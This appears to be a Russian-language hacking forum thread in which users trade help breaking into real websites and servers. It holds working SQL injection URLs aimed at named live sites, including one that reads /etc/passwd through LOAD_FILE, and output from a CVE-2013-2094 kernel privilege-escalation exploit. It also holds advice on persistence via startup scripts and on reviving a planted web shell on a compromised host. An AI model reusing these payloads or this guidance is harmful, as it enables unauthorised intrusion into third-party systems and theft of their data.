http://my.moldtelecom.md/scripturi/ajax_login.php?username=\&password=or+1=1+--+ Вы или помогаете или не мусорьте
http://my.moldtelecom.md/scripturi/...16,17,18,19,20,21,22,23,24,25,26,27,28,29+--+ возврашяет тру но нету вывода
Вектор еррор, вчера тоже тестил load_file(hex(0x2f6574632f706173737764)) 0x2f6574632f706173737764 это /etc/passwd п.с сам до конца не разобрался
Читать можно PHP: http://my.moldtelecom.md/scripturi/ajax_login.php?username=\&password=%20AND%20(SELECT%208838%20FROM(SELECT%20COUNT(*),CONCAT((MID((IFNULL(CAST(hex(LOAD_FILE(0x2f6574632f706173737764))%20AS%20CHAR),0x2020)),55,54)),%201,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)+--+- Скажите "Спасибо фазе"
Имеется Directory traversal (Не LFI) на windows. Файлы типа SAM прочитать нет возможности. Помимо этого имеется apache на другом порту. Как можно найти полный путь до этого апача или как можно получить доступ к самому серверу?
Никак. Данной уязвимости(за исключением крайне редких случаев) типа "Directory traversal" недостаточно для проникновения - надо копнуть глубже... Пути апача по дефолту в винде гуглятся, а не по дефолту - никак не узнаешь без читалки...
Имеется cms написанная на node.js, есть возможность заливать файлы. Но web сервер nodejs не позволяет запускать скрипты, можно ли их выполнить?
столкнулся с проблемой рутать пытаюсь сплоитом CVE-2013-2094 Linux 2.6.32/2.6.37 - 3.8.10 PERF_EVENTS local root x86/x86_64 Linux 2.6.34.7-56.40.x86_64 #1 SMP Fri Oct 22 18:48:49 UTC 2010 x86_64 x86_64 x86_64 GNU/Linux Compiling exp_abacus.c...OK. [+] Resolved set_fs_root to 0xffffffff810e8af8 [+] Resolved set_fs_pwd to 0xffffffff810e8a96 [+] Resolved __virt_addr_valid to 0xffffffff8102a87c [+] Resolved init_task to 0xffffffff816c9020 [+] Resolved init_fs to 0xffffffff816d9900 [+] Resolved default_exec_domain to 0xffffffff816d0660 [+] Resolved bad_file_ops to 0xffffffff81412da0 [+] Resolved bad_file_aio_read to 0xffffffff810dd407 [+] Resolved selinux_enforcing to 0xffffffff8194b968 [+] Resolved selinux_enabled to 0xffffffff8194b964 [+] Resolved security_ops to 0xffffffff8194a110 [+] Resolved default_security_ops to 0xffffffff816dc0b0 [+] Resolved sel_read_enforce to 0xffffffff81134709 [+] Resolved audit_enabled to 0xffffffff81909414 [+] Resolved commit_creds to 0xffffffff81057c93 [+] Resolved prepare_kernel_cred to 0xffffffff81057b8a [+] Resolved xen_start_info to 0xffffffff81886308 [+] Resolved ptmx_fops to 0xffffffff819564e0 [+] Resolved mark_rodata_ro to 0xffffffff81026458 [+] Resolved set_kernel_text_ro to 0xffffffff81026421 [+] Resolved make_lowmem_page_readonly to 0xffffffff81004fdf [+] Resolved make_lowmem_page_readwrite to 0xffffffff81004f1b [-] System rejected creation of perf event. plus Linux 3.2.0-4-amd64 #1 SMP Debian 3.2.65-1+deb7u1 x86_64 Compiling exp_abacus.c...OK. [+] Resolved set_fs_root to 0xffffffff8111cf7b [+] Resolved set_fs_pwd to 0xffffffff8111cfda [+] Resolved __virt_addr_valid to 0xffffffff81030c84 [+] Resolved init_task to 0xffffffff8160d020 (via System.map) [+] Resolved init_fs to 0xffffffff8162dd20 (via System.map) [+] Resolved default_exec_domain to 0xffffffff81617610 (via System.map) [+] Resolved bad_file_ops to 0xffffffff81412cc0 (via System.map) [+] Resolved bad_file_aio_read to 0xffffffff8110f030 [+] Resolved selinux_enforcing to 0xffffffff817ecbb8 (via System.map) [+] Resolved selinux_enabled to 0xffffffff81634640 (via System.map) [+] Resolved apparmor_enabled to 0xffffffff81635b8c (via System.map) [+] Resolved security_ops to 0xffffffff817eb370 (via System.map) [+] Resolved default_security_ops to 0xffffffff81630ae0 (via System.map) [+] Resolved sel_read_enforce to 0xffffffff8116cd0f [+] Resolved audit_enabled to 0xffffffff817b217c (via System.map) [+] Resolved commit_creds to 0xffffffff8106439e [+] Resolved prepare_kernel_cred to 0xffffffff81064657 [+] Resolved xen_start_info to 0xffffffff8172fd38 (via System.map) [+] Resolved ptmx_fops to 0xffffffff817fa020 (via System.map) [+] Resolved mark_rodata_ro to 0xffffffff8102dc73 [+] Resolved set_kernel_text_ro to 0xffffffff8102dc41 [+] Resolved make_lowmem_page_readonly to 0xffffffff8100627e [+] Resolved make_lowmem_page_readwrite to 0xffffffff810062b2 [-] System rejected creation of perf event.
Можно попробовать перезаписать существующие скрипты или положить свои в директорию с автоподключением. Все зависит от ваших прав и программного обеспечения. Если абстрагироваться от node - выбор у вас большой: различные start.sh, каталоги с конфигами, bashrc и т.п. Имеет смысл поискать CVE, позволяющие выполнить код с правами определенного приложения. Их довольно много.
Есть postgres с такими правами Code: [*] postgres (administrator) [3]: privilege: catupd privilege: createdb privilege: super Code: boolean-based blind Vector: OR NOT [INFERENCE] Пробовал это https://rdot.org/forum/showthread.php?t=24 Но не проходит стакед запрос, как можно залиться?
Привет всем! Наверно банальный вопрос, но все же спрошу, не против если отправите в нужное направление ). OpenVAS показывает уязвимость Format String on HTTP header value на нестандартном порту (8443) веб-сервера для Cisco UCM. Похожая "уязвимость" находится во многих продуктах, не только Cisco. Ниже вывод OpenVAS: The remote web server seems to be vulnerable to a format string attack on HTTP 1.0 header value. An attacker might use this flaw to make it crash or even execute arbitrary code on this host. CVSS Base Score: 6.9 Family name: Gain a shell remotely Category: destructive_attack Это реально можно как-то использовать?
Ситуация такая. Был у меня давний шелл на одном сайте. Недавно сайт вместе с шеллом перенесли на новый сервер. Итого имеем: Server software: Apache Disabled PHP Functions: exec,passthru,shell_exec,system,proc_open,popen,show_source,apache_child_terminate,apache_get_modules,apache_get_version,apache_getenv,apache_note,apache_setenv,posix_kill,posix_mkfifo,posix_setpgid,posix_setsid,posix_setuid,posix_getpwuid,posix_uname,pclose,dl,disk_free_space,diskfreespace,disk_total_space,pcntl_exec,proc_close,proc_get_status,proc_nice,proc_terminate,symlink,link cURL support: enabled Supported databases: MySql (5.5.47) Но это еще не все. Есть права на запись на многие файлы и директории, но туда невозможно залить файлы с расширениями php, php3 4 5 , phtml, phps и .htacccess. Невозможно также создать указанные файлы, соответственно невозможно скачать их с другого сервера , распаковать и или переименовать. Невозможно внести изменения в существующие php файлы и .htaccess хотя права на запись имеются. Короче что с этим можно сделать и куда копать дальше? Какие у кого будут мысли?
Парни, подскажите по одной непростой SQL иньекции: http://www.profclinic.ru/search/?search_string=[rand]' Где вместо [rand] - любое значение которое при каждом обращении должно меняться, дальше кавычка, в противном случае SQL не будет. Вот из за рандомного значения данную SQL не может схватить Sqlmap, в нем отсутствует макросс который мог бы генерировать рандомное значение (а может я плохо искал, и такой есть, подскажите). Сложность иньекции в том, что сам уязвимый скрипт разделяет части SQL запроса, если там встречаются символы пробела, запятой, точки, и ещё некоторых, не получается иньект провести. Если сможете подсказать вектр раскрутки данной уязвимости, очень поможете. Или через sqlmap или может быть в ошибку удастся вывести инфу.
selinux однозначно. А уже имеющиеся .php файлы редактировать можешь? И если не работает перловый или питоновский шелл, боюсь вариантов нету.
Точно там есть уязвимость http://www.profclinic.ru/search/?search_string=тут передаётся строка, то что вы вбили в поиск на Index.php